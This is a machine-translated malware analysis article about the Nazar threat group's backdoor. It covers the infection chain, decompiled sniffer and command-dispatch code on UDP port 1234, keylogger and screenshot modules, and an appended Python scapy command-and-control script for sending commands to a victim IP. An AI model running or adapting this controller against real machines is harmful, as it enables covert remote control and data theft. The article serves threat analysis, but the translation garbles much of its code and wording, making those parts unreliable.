Shulou(Shulou.com)05/31 Report--

How to analyze Nazar components in depth, aiming at this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.

6:22 AM 11/7/2012 conficker still on target

6:18 AM 11swap 7amp 2012 checking logs-we are clean

8:16 PM 7ax 2 Compact 2012-BOOMOS, got the callback

These are the records left by the equations (NSA) on the target system, which were later leaked by Shadow Brokers. Recently, security researchers revealed a previously misidentified and unknown threat organization, Nazar, and the following in-depth analysis of Nazar components.

Event background

Data leaked by shadow brokers has brought a number of vulnerabilities (such as EternalBlue) into the spotlight, but it also contains many more valuable components that show some of the precautions Equation Group takes before launching an attack.

For example, a file called "drv_list.txt" in the leaked file contains a list of driver names and corresponding comments, and if a driver is found on the target system, the information is sent to the attacker.

The list also contains the names of malicious drivers that, if found, indicate that the target system has been compromised by someone else, and then warn the attacker to "withdraw." The key component responsible for such checks is called "Territorial Dispute" or "TeDi".

"TeDi" contains 45 signatures to search the target system for registry keys and file names associated with other threat organizations. Unlike security scanning, the ultimate goal of attackers is to ensure that their operations are not interfered with and that other attackers do not detect their tools.

In some cases, preventing yourself from operating will not interfere with the operation of the "friendly" threat group and will not attack the same target at the same time.

Security researchers point out that the 37th signature in "TeDi" is looking for a document called "Godown.dll", which points to the Iranian threat group Nazar.

Execution process

Nazar started activity around 2008, possibly related to the 37th signature of TeDi', which is responsible for detecting the Nazar tool plug-in "Godown.dll".

The initial binary file executed by Nazar is gpUpdates.exe. It is a self-extracting document (SFX) created by Zip 2 Secure EXE. After execution, gpUpdates writes three files to disk: Data.bin,info and Distribute.exe, and then gpUpdates.exe starts Distribute.exe.

Distribute.exe

First, Distribute.exe will read info and Data.bin. Data.bin is a binary Blob that contains multiple PE files. The info file is very small and contains a simple structure that represents the length of the PE file in Data.bin. Distribute.exe reads the Data.bin one at a time in order of file length. The following table shows the relationship between Data.bin files and info write length.

Distribute.exe then writes three DLL files to the registry using regsv***.

Use CreateServiceA to add svchost.exe as a service named "EYService", start the service, and exit. This service is the main part of the attack, coordinating the Nazar invocation module.

Communication analysis

After the service is executed, packet sniffing is first set up.

DWORD _ stdcall main_thread (LPVOID lpThreadParameter) {HANDLE hMgr; / / edi HANDLE hCfg; / / esi HANDLE hFtr; / / edi hMgr = MgrCreate (); MgrInitialize (hMgr); hCfg = MgrGetFirstAdapterCfg (hMgr); do {if (! AdpCfgGetAccessibleState (hCfg)) break; hCfg = MgrGetNextAdapterCfg (hMgr, hCfg);} while (hCfg); ADP_struct = AdpCreate (); AdpSetConfig (ADP_struct, hCfg) If (! AdpOpenAdapter (ADP_struct)) {AdpGetConnectStatus (ADP_struct); MaxPacketSize = AdpCfgGetMaxPacketSize (hCfg); adapter_ip = AdpCfgGetIpA_wrapper (hCfg, 0); AdpCfgGetMACAddress (hCfg, & mac_address, 6); hFtr = BpfCreate (); BpfAddCmd (hFtr, BPF_LD_B_ABS, 23u); / / Get Protocol field value BpfAddJmp (hFtr, BPF_JMP_JEQ, IPPROTO_UDP, 0,1) / / Protocol = = UDP BpfAddCmd (hFtr, BPF_RET, 0xFFFFFFFF); BpfAddCmd (hFtr, BPF_RET, 0); AdpSetUserFilter (ADP_struct, hFtr); AdpSetUserFilterActive (ADP_struct, 1); AdpSetOnPacketRecv (ADP_struct, on_packet_recv_handler, 0); AdpSetMacFilter (ADP_struct, 2); while (1) {if (stop_and_ping = = 1) {adapter_ip = AdpCfgGetIpA_wrapper (hCfg, 0) Connection_method (2); stop_and_ping = 0;} Sleep (1000U);}} return 0;}

Whenever a UDP packet arrives, its source IP is recorded for the next response, whether there is a response or not. Then check the destination port of the packet, and if it is 1234, the data will be forwarded to the command processor.

Int _ cdecl commandMethodsWrapper (udp_t * udp_packet, int zero, char * src_ip, int ip_id) {int length; / / edi length = HIBYTE (udp_packet- > length)-8; ntohs (udp_packet- > src_port); if (ntohs (udp_packet- > dst_port)! = 1234) return 0; commandDispatcher (& udp_packet [1], src_ip, ip_id, length); return 1;}

Data response

Each response builds a packet from scratch, and there are three types of responses:

1. Send ACK: target port 4000, payload 101; 0000

2. Send computer information: target port 4000, payload 100;

3. Send the file: send the data through UDP, followed by the packet with it. If the server sends a packet identified as 0x3456 to destination port 1234, the malware sends a response using the destination port 0x5634.

Support command

The following table is a list of command support:

Dll Analysis of Godown.dll

Godown.dll is the DLL that SIG37 focuses on. It is a small DLL with only one function to turn off the computer.

Filesystem.dll

Filesystem.dll is a module written by the attacker himself. The purpose of this module is to enumerate the drives, folders, and files on the infected system and write the results to Drives.txt and Files.txt.

So far, it has been found that both versions contain PDB paths, which refer to folders with Persian words of Khzer (or "folders"):

C:\\ khzer\\ DLLs\\ DLL's Source\\ Filesystem\ Debug\\ Filesystem.pdb

D:\\ Khzer\ Client\\ DLL's Source\\ Filesystem\\ Debug\\ Filesystem.pdb

There are some differences between the two paths, indicating that the two versions of the module were not compiled in the same environment.

Hodll.dll

The hodll.dll module is responsible for keyboard recording, which is done by setting hooks. The code comes from the open source library, which is, to some extent, like the code that copied multiple projects from the Internet and finally put it together.

ViewScreen.dll

The DLL is based on an open source project called "BMGLib" to take screenshots of the victim's computer.

Appendix IOCsPython Server

From scapy.all import * import structimport socketimport hexdumpimport argparseDST_PORT = 123 "4000 is the usual port without sending files, but we use it for everything, because why not?SERVER_PORT = 400" We want to make sure the ID has the little endian of itID = struct.unpack ('> H' > Struct.pack (''). Strip () if 'quit' in curr_message: return None if' help' in curr_message: print (MENU) else: return curr_messagedef get_sock (): sock = socket.socket (socket.AF_INET, socket.SOCK_DGRAM) server_address = '0.0.0.0' server = (server_address SERVER_PORT) sock.bind (server) return sock def main (ip_addr): sock = get_sock () print (MENU) multi_packets = [200,2011,119,189,311,1999,599] single_packets = [999 " All_commands = single_packets + multi_packets while True: curr_message = get_message () if not curr_message: break # Send message using scapy # Make sure the IP identification field is little endian of the port. Sr1 (IP (dst=ip_addr, id=ID) / UDP (sport=SERVER_PORT,dport=1234) / Raw (load=curr_message), verbose=0) command = curr_message [: 3] if command not in all_commands: continue should_loop = command in multi_packets get_response (sock Should_loop) if _ _ name__ = ='_ main__': parser = argparse.ArgumentParser (description= "victim's IP") parser.add_argument ('ip') args = parser.parse_args () main (args.ip) the answer to the question of how to analyze Nazar components in depth is shared here. I hope the above content can help you to a certain extent, if you still have a lot of doubts to be solved, you can follow the industry information channel to learn more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.